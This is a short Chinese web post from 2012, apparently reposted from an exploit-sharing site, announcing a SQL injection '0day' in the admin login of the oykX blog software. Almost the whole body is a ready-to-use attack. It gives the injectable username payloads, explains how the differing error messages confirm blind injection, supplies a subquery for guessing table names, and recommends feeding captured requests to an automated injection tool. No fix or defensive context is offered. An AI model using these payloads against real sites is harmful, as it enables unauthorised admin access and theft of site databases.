oykX博客后台post注射0day
发布时间:2012-02-04 21:30文章来源:网络文章作者:秩名 点击次数:
次
摘要:漏洞说明: 进入http://www.xxx.com /admin/index.aspx 在帐号输入框处填123' or 1=1 and '1'='1 密码为空(也可以乱填),点击Login 提示密码错误 把帐号输入框语句换成123' or 1=2 and '1'='1提示用户不存在, 注射漏洞由此产生了 后面猜表名:123' or (se...
漏洞说明:
进入http://www.xxx.com /admin/index.aspx
在帐号输入框处填123' or 1=1 and '1'='1
密码为空(也可以乱填),点击Login 提示密码错误
把帐号输入框语句换成123' or 1=2 and '1'='1提示用户不存在,
注射漏洞由此产生了
后面猜表名:123' or (select count(*)from 表名)>0
也可以抓包注射丢进穿山甲
http://expsec.com版权所有!转载请注明出处
标签分类:
下一篇:将乐人新闻系统任意添加、修改管理账号
相关阅读
